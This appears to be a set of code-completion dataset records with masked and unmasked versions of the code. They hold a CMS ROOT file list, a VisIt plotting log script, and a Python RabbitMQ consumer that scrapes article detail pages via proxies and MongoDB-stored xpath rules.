'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_13_1_Pwh.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_14_1_1cS.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_15_1_dnc.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_16_1_Kh7.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_17_1_Gt5.root',\n 
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_18_1_Bvh.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_19_1_6KB.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_1_1_uAS.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_20_1_8Ra.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_21_1_l0p.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_22_1_rCA.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_23_1_Ec0.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_24_1_NtE.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_25_1_QNK.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_2_1_kmn.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_3_1_LIi.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_4_1_Q4Z.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_5_1_ap1.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_6_1_KyS.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_7_1_FQo.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_8_1_MdF.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_9_1_NrM.root',\n )\n\n)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Visit 2.12.3 log file
ScriptVersion = "2.12.3"
if ScriptVersion != Version():
print "This script is for VisIt %s. It may not work with version %s" % (ScriptVersion, Version())
visit.ShowAllWindows()
visit.ShowAllWindows()
visit.OpenDatabase("test.vtk", 0)
# The UpdateDBPluginInfo RPC is not supported in the VisIt module so it will not be logged.
visit.AddPlot("Pseudocolor", "scalars", 1, 1)
visit.DrawPlots()
SaveWindowAtts = visit.SaveWindowAttributes()
SaveWindowAtts.outputToCurrentDirectory = 1
SaveWindowAtts.outputDirectory = "."
SaveWindowAtts.fileName = "visit"
SaveWindowAtts.family = 1
SaveWindowAtts.format = SaveWindowAtts.PNG # BMP, CURVE, JPEG, OBJ, PNG, POSTSCRIPT, POVRAY, PPM, RGB, STL, TIFF, ULTRA, VTK, PLY
SaveWindowAtts.width = 1024
SaveWindowAtts.height = 1024
SaveWindowAtts.screenCapture = 0
SaveWindowAtts.saveTiled = 0
SaveWindowAtts.quality = 80
SaveWindowAtts.progressive = 0
SaveWindowAtts.binary = 0
SaveWindowAtts.stereo = 0
SaveWindowAtts.compression = SaveWindowAtts.PackBits # None, PackBits, Jpeg, Deflate
SaveWindowAtts.forceMerge = 0
SaveWindowAtts.resConstraint = SaveWindowAtts.ScreenProportions # NoConstraint, EqualWidthHeight, ScreenProportions
SaveWindowAtts.advancedMultiWindowSave = 0
visit.SetSaveWindowAttributes(SaveWindowAtts)
visit.SaveWindow()
# Begin spontaneous state
View3DAtts = visit.View3DAttributes()
View3DAtts.viewNormal = (0.264045, 0.220135, 0.939053)
View3DAtts.focus = (1, 1, 1)
View3DAtts.viewUp = (0.100817, 0.961974, -0.253856)
View3DAtts.viewAngle = 30
View3DAtts.parallelScale = 1.73205
View3DAtts.nearPlane = -3.4641
View3DAtts.farPlane = 3.4641
View3DAtts.imagePan = (0, 0)
View3DAtts.imageZoom = 1
View3DAtts.perspective = 1
View3DAtts.eyeAngle = 2
View3DAtts.centerOfRotationSet = 0
View3DAtts.centerOfRotation = (1, 1, 1)
View3DAtts.axis3DScaleFlag = 0
View3DAtts.axis3DScales = (1, 1, 1)
View3DAtts.shear = (0, 0, 1)
View3DAtts.windowValid = 1
visit.SetView3D(View3DAtts)
# End spontaneous state
|
normal
|
{
"blob_id": "6d0cfc9d5bbc45bfa356c45a7cdb9f4822b03e0a",
"index": 2983,
"step-1": "# Visit 2.12.3 log file\nScriptVersion = \"2.12.3\"\nif ScriptVersion != Version():\n print \"This script is for VisIt %s. It may not work with version %s\" % (ScriptVersion, Version())\nvisit.ShowAllWindows()\nvisit.ShowAllWindows()\nvisit.OpenDatabase(\"test.vtk\", 0)\n# The UpdateDBPluginInfo RPC is not supported in the VisIt module so it will not be logged.\nvisit.AddPlot(\"Pseudocolor\", \"scalars\", 1, 1)\nvisit.DrawPlots()\nSaveWindowAtts = visit.SaveWindowAttributes()\nSaveWindowAtts.outputToCurrentDirectory = 1\nSaveWindowAtts.outputDirectory = \".\"\nSaveWindowAtts.fileName = \"visit\"\nSaveWindowAtts.family = 1\nSaveWindowAtts.format = SaveWindowAtts.PNG # BMP, CURVE, JPEG, OBJ, PNG, POSTSCRIPT, POVRAY, PPM, RGB, STL, TIFF, ULTRA, VTK, PLY\nSaveWindowAtts.width = 1024\nSaveWindowAtts.height = 1024\nSaveWindowAtts.screenCapture = 0\nSaveWindowAtts.saveTiled = 0\nSaveWindowAtts.quality = 80\nSaveWindowAtts.progressive = 0\nSaveWindowAtts.binary = 0\nSaveWindowAtts.stereo = 0\nSaveWindowAtts.compression = SaveWindowAtts.PackBits # None, PackBits, Jpeg, Deflate\nSaveWindowAtts.forceMerge = 0\nSaveWindowAtts.resConstraint = SaveWindowAtts.ScreenProportions # NoConstraint, EqualWidthHeight, ScreenProportions\nSaveWindowAtts.advancedMultiWindowSave = 0\nvisit.SetSaveWindowAttributes(SaveWindowAtts)\nvisit.SaveWindow()\n# Begin spontaneous state\nView3DAtts = visit.View3DAttributes()\nView3DAtts.viewNormal = (0.264045, 0.220135, 0.939053)\nView3DAtts.focus = (1, 1, 1)\nView3DAtts.viewUp = (0.100817, 0.961974, -0.253856)\nView3DAtts.viewAngle = 30\nView3DAtts.parallelScale = 1.73205\nView3DAtts.nearPlane = -3.4641\nView3DAtts.farPlane = 3.4641\nView3DAtts.imagePan = (0, 0)\nView3DAtts.imageZoom = 1\nView3DAtts.perspective = 1\nView3DAtts.eyeAngle = 2\nView3DAtts.centerOfRotationSet = 0\nView3DAtts.centerOfRotation = (1, 1, 1)\nView3DAtts.axis3DScaleFlag = 0\nView3DAtts.axis3DScales = (1, 1, 1)\nView3DAtts.shear = (0, 0, 1)\nView3DAtts.windowValid = 
1\nvisit.SetView3D(View3DAtts)\n# End spontaneous state\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class CrawlerDetail:
def __init__(self):
self.proxy = Proxies()
def start_consume(self):
channel = connection.channel()
channel.queue_declare(queue='usual_article')
channel.basic_qos(prefetch_count=1)
channel.basic_consume(self.consume_article_detail_url, queue=
'usual_article', no_ack=False)
channel.start_consuming()
<|reserved_special_token_0|>
def consume_article_detail_url(self, ch, method, properties, body):
"""
文章详情页解析
:param ch:
:param method:
:param properties:
:param body: json格式字符串
:return:
"""
message = json.loads(body.decode())
for i in range(10):
try:
html = requests.get(message['detail_url'], timeout=10,
proxies=next(self.proxy))
connection.process_data_events()
if html.status_code == 200:
break
except Exception as e:
connection.process_data_events()
if i == 10:
log.error('请求文章详情页{}失败'.format(message['detail_url']))
ch.basic_ack(delivery_tag=method.delivery_tag)
try:
con = html.content.decode()
except:
try:
con = html.content.decode('gbk')
except:
log.error('{}utf-8,gbk编码解析失败'.format(message['detail_url']))
ch.basic_ack(delivery_tag=method.delivery_tag)
return
page = etree.HTML(con)
detail_config_dict = collection.find_one({'source': message['source']})
if detail_config_dict['body'] is not None:
try:
for pattern in detail_config_dict['body']:
if page.xpath(pattern):
article_body = page.xpath(pattern)[0]
message['body'] = etree.tounicode(article_body)
break
except:
log.error('xpath语句未能解析body')
ch.basic_ack(delivery_tag=method.delivery_tag)
return
if detail_config_dict['comment_count'] is not None:
message['comment_count'] = page.xpath(detail_config_dict[
'comment_count'])[0]
if detail_config_dict['like_count'] is not None:
message['like_count'] = page.xpath(detail_config_dict['like_count']
)[0]
if detail_config_dict['read_num'] is not None:
message['read_num'] = page.xpath(detail_config_dict['read_num'])[0]
if detail_config_dict['author'] is not None:
try:
message['author'] = page.xpath(detail_config_dict['author'])[0]
except:
log.info('没有提取到{}作者字段'.format(message['detail_url']))
if detail_config_dict['post_time'] is not None:
try:
message['post_time'] = page.xpath(detail_config_dict[
'post_time'])[0]
except:
log.info('没有提取到{}文章发表时间'.format(message['detail_url']))
if detail_config_dict['tag'] is not None:
message['tag'] = page.xpath(detail_config_dict['tag'])[0]
if detail_config_dict['source_detail'] is not None:
try:
message['source_detail'] = page.xpath(detail_config_dict[
'source_detail'])[0]
except:
log.info('没有提取到{}文章详细来源'.format(message['detail_url']))
self.clean(message)
produce_channel = connection.channel()
produce_channel.queue_declare('article_body')
article_text = json.dumps(message)
produce_channel.basic_publish(exchange='', routing_key=
'article_body', body=article_text)
log.info('{}已经放入清洗队列'.format(message['title']))
ch.basic_ack(delivery_tag=method.delivery_tag)
produce_channel.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CrawlerDetail:
def __init__(self):
self.proxy = Proxies()
def start_consume(self):
channel = connection.channel()
channel.queue_declare(queue='usual_article')
channel.basic_qos(prefetch_count=1)
channel.basic_consume(self.consume_article_detail_url, queue=
'usual_article', no_ack=False)
channel.start_consuming()
def clean(self, message):
"""
作者,发布时间,详细来源字段清洗
:param message:
:return:
"""
clean = clean_coll.find_one({'source': message['source']})
if clean['post_time'] is not None:
try:
post_time = re.search(clean['post_time'], message[
'post_time'], re.S | re.M).group(1)
message['post_time'] = post_time
except:
log.info('post_time清洗失败{}'.format(message['post_time']))
message['post_time'] = None
if clean['author'] is not None:
try:
author = re.search(clean['author'], message['author']).group(1)
message['author'] = author
except:
log.info('author清洗失败{}'.format(message['author']))
message['author'] = None
if clean['source_detail'] is not None:
try:
source_detail = re.search(clean['source_detail'], message[
'source_detail'], re.S | re.M).group(1)
message['source_detail'] = source_detail
except:
log.info('source_detail清洗失败{}'.format(message['source_detail'])
)
message['source_detail'] = None
return message
def consume_article_detail_url(self, ch, method, properties, body):
"""
文章详情页解析
:param ch:
:param method:
:param properties:
:param body: json格式字符串
:return:
"""
message = json.loads(body.decode())
for i in range(10):
try:
html = requests.get(message['detail_url'], timeout=10,
proxies=next(self.proxy))
connection.process_data_events()
if html.status_code == 200:
break
except Exception as e:
connection.process_data_events()
if i == 10:
log.error('请求文章详情页{}失败'.format(message['detail_url']))
ch.basic_ack(delivery_tag=method.delivery_tag)
try:
con = html.content.decode()
except:
try:
con = html.content.decode('gbk')
except:
log.error('{}utf-8,gbk编码解析失败'.format(message['detail_url']))
ch.basic_ack(delivery_tag=method.delivery_tag)
return
page = etree.HTML(con)
detail_config_dict = collection.find_one({'source': message['source']})
if detail_config_dict['body'] is not None:
try:
for pattern in detail_config_dict['body']:
if page.xpath(pattern):
article_body = page.xpath(pattern)[0]
message['body'] = etree.tounicode(article_body)
break
except:
log.error('xpath语句未能解析body')
ch.basic_ack(delivery_tag=method.delivery_tag)
return
if detail_config_dict['comment_count'] is not None:
message['comment_count'] = page.xpath(detail_config_dict[
'comment_count'])[0]
if detail_config_dict['like_count'] is not None:
message['like_count'] = page.xpath(detail_config_dict['like_count']
)[0]
if detail_config_dict['read_num'] is not None:
message['read_num'] = page.xpath(detail_config_dict['read_num'])[0]
if detail_config_dict['author'] is not None:
try:
message['author'] = page.xpath(detail_config_dict['author'])[0]
except:
log.info('没有提取到{}作者字段'.format(message['detail_url']))
if detail_config_dict['post_time'] is not None:
try:
message['post_time'] = page.xpath(detail_config_dict[
'post_time'])[0]
except:
log.info('没有提取到{}文章发表时间'.format(message['detail_url']))
if detail_config_dict['tag'] is not None:
message['tag'] = page.xpath(detail_config_dict['tag'])[0]
if detail_config_dict['source_detail'] is not None:
try:
message['source_detail'] = page.xpath(detail_config_dict[
'source_detail'])[0]
except:
log.info('没有提取到{}文章详细来源'.format(message['detail_url']))
self.clean(message)
produce_channel = connection.channel()
produce_channel.queue_declare('article_body')
article_text = json.dumps(message)
produce_channel.basic_publish(exchange='', routing_key=
'article_body', body=article_text)
log.info('{}已经放入清洗队列'.format(message['title']))
ch.basic_ack(delivery_tag=method.delivery_tag)
produce_channel.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
m.admin.authenticate(setting['mongo_config']['user_name'], setting[
'mongo_config']['password'])
<|reserved_special_token_0|>
class CrawlerDetail:
def __init__(self):
self.proxy = Proxies()
def start_consume(self):
channel = connection.channel()
channel.queue_declare(queue='usual_article')
channel.basic_qos(prefetch_count=1)
channel.basic_consume(self.consume_article_detail_url, queue=
'usual_article', no_ack=False)
channel.start_consuming()
def clean(self, message):
"""
作者,发布时间,详细来源字段清洗
:param message:
:return:
"""
clean = clean_coll.find_one({'source': message['source']})
if clean['post_time'] is not None:
try:
post_time = re.search(clean['post_time'], message[
'post_time'], re.S | re.M).group(1)
message['post_time'] = post_time
except:
log.info('post_time清洗失败{}'.format(message['post_time']))
message['post_time'] = None
if clean['author'] is not None:
try:
author = re.search(clean['author'], message['author']).group(1)
message['author'] = author
except:
log.info('author清洗失败{}'.format(message['author']))
message['author'] = None
if clean['source_detail'] is not None:
try:
source_detail = re.search(clean['source_detail'], message[
'source_detail'], re.S | re.M).group(1)
message['source_detail'] = source_detail
except:
log.info('source_detail清洗失败{}'.format(message['source_detail'])
)
message['source_detail'] = None
return message
def consume_article_detail_url(self, ch, method, properties, body):
"""
文章详情页解析
:param ch:
:param method:
:param properties:
:param body: json格式字符串
:return:
"""
message = json.loads(body.decode())
for i in range(10):
try:
html = requests.get(message['detail_url'], timeout=10,
proxies=next(self.proxy))
connection.process_data_events()
if html.status_code == 200:
break
except Exception as e:
connection.process_data_events()
if i == 10:
log.error('请求文章详情页{}失败'.format(message['detail_url']))
ch.basic_ack(delivery_tag=method.delivery_tag)
try:
con = html.content.decode()
except:
try:
con = html.content.decode('gbk')
except:
log.error('{}utf-8,gbk编码解析失败'.format(message['detail_url']))
ch.basic_ack(delivery_tag=method.delivery_tag)
return
page = etree.HTML(con)
detail_config_dict = collection.find_one({'source': message['source']})
if detail_config_dict['body'] is not None:
try:
for pattern in detail_config_dict['body']:
if page.xpath(pattern):
article_body = page.xpath(pattern)[0]
message['body'] = etree.tounicode(article_body)
break
except:
log.error('xpath语句未能解析body')
ch.basic_ack(delivery_tag=method.delivery_tag)
return
if detail_config_dict['comment_count'] is not None:
message['comment_count'] = page.xpath(detail_config_dict[
'comment_count'])[0]
if detail_config_dict['like_count'] is not None:
message['like_count'] = page.xpath(detail_config_dict['like_count']
)[0]
if detail_config_dict['read_num'] is not None:
message['read_num'] = page.xpath(detail_config_dict['read_num'])[0]
if detail_config_dict['author'] is not None:
try:
message['author'] = page.xpath(detail_config_dict['author'])[0]
except:
log.info('没有提取到{}作者字段'.format(message['detail_url']))
if detail_config_dict['post_time'] is not None:
try:
message['post_time'] = page.xpath(detail_config_dict[
'post_time'])[0]
except:
log.info('没有提取到{}文章发表时间'.format(message['detail_url']))
if detail_config_dict['tag'] is not None:
message['tag'] = page.xpath(detail_config_dict['tag'])[0]
if detail_config_dict['source_detail'] is not None:
try:
message['source_detail'] = page.xpath(detail_config_dict[
'source_detail'])[0]
except:
log.info('没有提取到{}文章详细来源'.format(message['detail_url']))
self.clean(message)
produce_channel = connection.channel()
produce_channel.queue_declare('article_body')
article_text = json.dumps(message)
produce_channel.basic_publish(exchange='', routing_key=
'article_body', body=article_text)
log.info('{}已经放入清洗队列'.format(message['title']))
ch.basic_ack(delivery_tag=method.delivery_tag)
produce_channel.close()
<|reserved_special_token_1|>
import requests
from lxml import etree
from pymongo import MongoClient
from lib.rabbitmq import Rabbit
from lib.log import LogHandler
from lib.proxy_iterator import Proxies
import yaml
import json
import datetime
import re
import time
setting = yaml.load(open('config_local.yaml'))
log = LogHandler('article_consumer')
m = MongoClient(setting['mongo_config']['config_host'], setting[
'mongo_config']['port'])
m.admin.authenticate(setting['mongo_config']['user_name'], setting[
'mongo_config']['password'])
collection = m[setting['mongo_config']['config_db']][setting['mongo_config'
]['coll_detail']]
clean_coll = m[setting['mongo_config']['config_db']][setting['mongo_config'
]['clean']]
rabbit = Rabbit(setting['rabbitmq_host'], setting['rabbitmq_port'])
connection = rabbit.connection
class CrawlerDetail:
    """RabbitMQ consumer that fetches article detail pages, extracts fields
    according to per-source rules stored in Mongo, and republishes the
    result to the 'article_body' queue for downstream body cleaning."""

    def __init__(self):
        # Rotating proxy iterator; next(self.proxy) yields a proxies dict
        # suitable for requests.get(..., proxies=...).
        self.proxy = Proxies()

    def start_consume(self):
        """Block forever consuming 'usual_article', one unacked message at a time."""
        channel = connection.channel()
        channel.queue_declare(queue='usual_article')
        channel.basic_qos(prefetch_count=1)  # fair dispatch across workers
        channel.basic_consume(self.consume_article_detail_url, queue=
            'usual_article', no_ack=False)
        channel.start_consuming()

    def clean(self, message):
        """
        Clean the author / post_time / source_detail fields with the
        per-source regexes stored in ``clean_coll``.  A field whose regex
        fails to match is reset to None so bad data never reaches
        downstream consumers.

        :param message: article dict (mutated in place)
        :return: the same dict, for convenience
        """
        clean = clean_coll.find_one({'source': message['source']})
        if clean['post_time'] is not None:
            try:
                message['post_time'] = re.search(clean['post_time'],
                    message['post_time'], re.S | re.M).group(1)
            except Exception:
                log.info('post_time清洗失败{}'.format(message['post_time']))
                message['post_time'] = None
        if clean['author'] is not None:
            try:
                message['author'] = re.search(clean['author'],
                    message['author']).group(1)
            except Exception:
                log.info('author清洗失败{}'.format(message['author']))
                message['author'] = None
        if clean['source_detail'] is not None:
            try:
                message['source_detail'] = re.search(clean['source_detail'],
                    message['source_detail'], re.S | re.M).group(1)
            except Exception:
                log.info('source_detail清洗失败{}'.format(message['source_detail'])
                    )
                message['source_detail'] = None
        return message

    def consume_article_detail_url(self, ch, method, properties, body):
        """
        Parse one article detail page and publish the result for cleaning.

        :param ch: AMQP channel the message arrived on (used for ack)
        :param method: delivery metadata (used for ack)
        :param properties: unused AMQP properties
        :param body: JSON bytes with at least detail_url/source/title
        """
        message = json.loads(body.decode())
        for _ in range(10):
            try:
                html = requests.get(message['detail_url'], timeout=10,
                    proxies=next(self.proxy))
                # Service AMQP heartbeats so the broker does not drop us
                # while we wait on slow fetches.
                connection.process_data_events()
                if html.status_code == 200:
                    break
            except Exception:
                connection.process_data_events()
        else:
            # BUG FIX: the original tested ``i == 10``, which range(10)
            # never yields, so exhausted retries fell through to parsing
            # with ``html`` possibly unbound.  Ack and drop instead.
            log.error('请求文章详情页{}失败'.format(message['detail_url']))
            ch.basic_ack(delivery_tag=method.delivery_tag)
            return
        try:
            con = html.content.decode()
        except UnicodeDecodeError:
            try:
                # Fall back to GBK, common on Chinese news sites.
                con = html.content.decode('gbk')
            except UnicodeDecodeError:
                log.error('{}utf-8,gbk编码解析失败'.format(message['detail_url']))
                ch.basic_ack(delivery_tag=method.delivery_tag)
                return
        page = etree.HTML(con)
        # Per-source xpath configuration for this article's origin site.
        detail_config_dict = collection.find_one({'source': message['source']})
        if detail_config_dict['body'] is not None:
            try:
                # Try each candidate pattern until one matches.
                for pattern in detail_config_dict['body']:
                    if page.xpath(pattern):
                        article_body = page.xpath(pattern)[0]
                        message['body'] = etree.tounicode(article_body)
                        break
            except Exception:
                log.error('xpath语句未能解析body')
                ch.basic_ack(delivery_tag=method.delivery_tag)
                return
        if detail_config_dict['comment_count'] is not None:
            message['comment_count'] = page.xpath(detail_config_dict[
                'comment_count'])[0]
        if detail_config_dict['like_count'] is not None:
            message['like_count'] = page.xpath(detail_config_dict['like_count']
                )[0]
        if detail_config_dict['read_num'] is not None:
            message['read_num'] = page.xpath(detail_config_dict['read_num'])[0]
        if detail_config_dict['author'] is not None:
            try:
                message['author'] = page.xpath(detail_config_dict['author'])[0]
            except Exception:
                log.info('没有提取到{}作者字段'.format(message['detail_url']))
        if detail_config_dict['post_time'] is not None:
            try:
                message['post_time'] = page.xpath(detail_config_dict[
                    'post_time'])[0]
            except Exception:
                log.info('没有提取到{}文章发表时间'.format(message['detail_url']))
        if detail_config_dict['tag'] is not None:
            message['tag'] = page.xpath(detail_config_dict['tag'])[0]
        if detail_config_dict['source_detail'] is not None:
            try:
                message['source_detail'] = page.xpath(detail_config_dict[
                    'source_detail'])[0]
            except Exception:
                log.info('没有提取到{}文章详细来源'.format(message['detail_url']))
        self.clean(message)
        # Hand off to the body-cleaning stage.
        produce_channel = connection.channel()
        produce_channel.queue_declare('article_body')
        article_text = json.dumps(message)
        produce_channel.basic_publish(exchange='', routing_key=
            'article_body', body=article_text)
        log.info('{}已经放入清洗队列'.format(message['title']))
        ch.basic_ack(delivery_tag=method.delivery_tag)
        produce_channel.close()
<|reserved_special_token_1|>
import requests
from lxml import etree
from pymongo import MongoClient
from lib.rabbitmq import Rabbit
from lib.log import LogHandler
from lib.proxy_iterator import Proxies
import yaml
import json
import datetime
import re
import time
# Module-level wiring: config file, Mongo collections holding the per-source
# parsing/cleaning rules, and the shared RabbitMQ connection.
# NOTE(review): yaml.load without an explicit Loader is deprecated and the
# open() file handle is never closed; prefer yaml.safe_load in a `with` block.
setting = yaml.load(open('config_local.yaml'))
log = LogHandler('article_consumer')
m = MongoClient(setting['mongo_config']['config_host'], setting['mongo_config']['port'])
m.admin.authenticate(setting['mongo_config']['user_name'],setting['mongo_config']['password'] )
# Per-source xpath rules for detail pages.
collection = m[setting['mongo_config']['config_db']][setting['mongo_config']['coll_detail']]
# Per-source regex rules used by CrawlerDetail.clean().
clean_coll = m[setting['mongo_config']['config_db']][setting['mongo_config']['clean']]
rabbit = Rabbit(setting['rabbitmq_host'],setting['rabbitmq_port'])
connection = rabbit.connection
class CrawlerDetail:
    """RabbitMQ consumer that fetches article detail pages, extracts fields
    per the rules stored in Mongo, and republishes them for body cleaning."""

    def __init__(self):
        # Rotating proxy iterator; next(self.proxy) yields a proxies dict.
        self.proxy = Proxies()

    def start_consume(self):
        # Block forever on 'usual_article', one unacked message at a time.
        channel = connection.channel()
        channel.queue_declare(queue='usual_article')
        channel.basic_qos(prefetch_count=1)
        channel.basic_consume(self.consume_article_detail_url,
                              queue='usual_article',
                              no_ack=False)
        channel.start_consuming()

    def clean(self,message):
        """
        Clean the author, post_time and source_detail fields with the
        per-source regexes stored in ``clean_coll``; a field whose regex
        fails to match is reset to None.
        :param message: article dict, mutated in place
        :return: the same dict
        """
        clean = clean_coll.find_one({'source': message['source']})
        if clean['post_time'] is not None:
            try:
                post_time = re.search(clean['post_time'],message['post_time'],re.S|re.M).group(1)
                message['post_time'] = post_time
            except:
                log.info("post_time清洗失败{}".format(message['post_time']))
                message['post_time'] = None
        if clean['author'] is not None:
            try:
                author = re.search(clean['author'],message['author']).group(1)
                message['author'] = author
            except:
                log.info("author清洗失败{}".format(message['author']))
                message['author'] = None

        if clean['source_detail'] is not None:
            try:
                source_detail = re.search(clean['source_detail'],message['source_detail'],re.S|re.M).group(1)
                message['source_detail'] = source_detail
            except:
                log.info("source_detail清洗失败{}".format(message['source_detail']))
                message['source_detail'] = None

        return message

    def consume_article_detail_url(self,ch, method, properties, body):
        """
        Parse one article detail page and publish the result for cleaning.
        :param ch: AMQP channel the message arrived on (used for ack)
        :param method: delivery metadata
        :param properties: unused AMQP properties
        :param body: JSON-formatted string
        :return:
        """
        message = json.loads(body.decode())
        for i in range(10):
            try:
                html = requests.get(message['detail_url'],timeout=10,proxies=next(self.proxy))
                # Service AMQP heartbeats while waiting on slow fetches.
                connection.process_data_events()
                if html.status_code == 200:
                    break
            except Exception as e:
                connection.process_data_events()
        if i == 10:
            # NOTE(review): dead code -- range(10) never yields 10, so this
            # failure branch can never run and `html` may be unbound below.
            log.error("请求文章详情页{}失败".format(message['detail_url']))
            ch.basic_ack(delivery_tag=method.delivery_tag)
        try:
            con = html.content.decode()
        except:
            try:
                # Fall back to GBK, common on Chinese news sites.
                con = html.content.decode('gbk')
            except:
                log.error('{}utf-8,gbk编码解析失败'.format(message['detail_url']))
                ch.basic_ack(delivery_tag=method.delivery_tag)
                return
        page = etree.HTML(con)

        # Fetch the per-source parsing rules for this site's detail pages.
        detail_config_dict = collection.find_one({'source': message['source']})

        if detail_config_dict['body'] is not None:
            try:
                # Try each candidate xpath pattern until one matches.
                for pattern in detail_config_dict['body']:
                    if page.xpath(pattern):
                        article_body = page.xpath(pattern)[0]
                        message['body'] = etree.tounicode(article_body)
                        break
            except:
                log.error('xpath语句未能解析body')
                ch.basic_ack(delivery_tag=method.delivery_tag)
                return
        if detail_config_dict['comment_count'] is not None:
            message['comment_count'] = page.xpath(detail_config_dict['comment_count'])[0]
        if detail_config_dict['like_count'] is not None:
            message['like_count'] = page.xpath(detail_config_dict['like_count'])[0]
        if detail_config_dict['read_num'] is not None:
            message['read_num'] = page.xpath(detail_config_dict['read_num'])[0]
        if detail_config_dict['author'] is not None:
            try:
                message['author'] = page.xpath(detail_config_dict['author'])[0]
            except:
                log.info("没有提取到{}作者字段".format(message['detail_url']))
        if detail_config_dict['post_time'] is not None:
            try:
                message['post_time'] = page.xpath(detail_config_dict['post_time'])[0]
            except:
                log.info("没有提取到{}文章发表时间".format(message['detail_url']))
        if detail_config_dict['tag'] is not None:
            message['tag'] = page.xpath(detail_config_dict['tag'])[0]
        if detail_config_dict['source_detail'] is not None:
            try:
                message['source_detail'] = page.xpath(detail_config_dict['source_detail'])[0]
            except:
                log.info("没有提取到{}文章详细来源".format(message['detail_url']))

        self.clean(message)

        # Queue the article for body-replacement cleaning.
        produce_channel = connection.channel()
        produce_channel.queue_declare('article_body')
        article_text = json.dumps(message)
        produce_channel.basic_publish(exchange='',
                                      routing_key='article_body',
                                      body=article_text)
        log.info('{}已经放入清洗队列'.format(message['title']))
        ch.basic_ack(delivery_tag=method.delivery_tag)
        produce_channel.close()
|
flexible
|
{
"blob_id": "cd1d8a73b6958775a212d80b50de74f4b4de18bf",
"index": 6319,
"step-1": "<mask token>\n\n\nclass CrawlerDetail:\n\n def __init__(self):\n self.proxy = Proxies()\n\n def start_consume(self):\n channel = connection.channel()\n channel.queue_declare(queue='usual_article')\n channel.basic_qos(prefetch_count=1)\n channel.basic_consume(self.consume_article_detail_url, queue=\n 'usual_article', no_ack=False)\n channel.start_consuming()\n <mask token>\n\n def consume_article_detail_url(self, ch, method, properties, body):\n \"\"\"\n 文章详情页解析\n :param ch:\n :param method:\n :param properties:\n :param body: json格式字符串\n :return:\n \"\"\"\n message = json.loads(body.decode())\n for i in range(10):\n try:\n html = requests.get(message['detail_url'], timeout=10,\n proxies=next(self.proxy))\n connection.process_data_events()\n if html.status_code == 200:\n break\n except Exception as e:\n connection.process_data_events()\n if i == 10:\n log.error('请求文章详情页{}失败'.format(message['detail_url']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n try:\n con = html.content.decode()\n except:\n try:\n con = html.content.decode('gbk')\n except:\n log.error('{}utf-8,gbk编码解析失败'.format(message['detail_url']))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return\n page = etree.HTML(con)\n detail_config_dict = collection.find_one({'source': message['source']})\n if detail_config_dict['body'] is not None:\n try:\n for pattern in detail_config_dict['body']:\n if page.xpath(pattern):\n article_body = page.xpath(pattern)[0]\n message['body'] = etree.tounicode(article_body)\n break\n except:\n log.error('xpath语句未能解析body')\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return\n if detail_config_dict['comment_count'] is not None:\n message['comment_count'] = page.xpath(detail_config_dict[\n 'comment_count'])[0]\n if detail_config_dict['like_count'] is not None:\n message['like_count'] = page.xpath(detail_config_dict['like_count']\n )[0]\n if detail_config_dict['read_num'] is not None:\n message['read_num'] = 
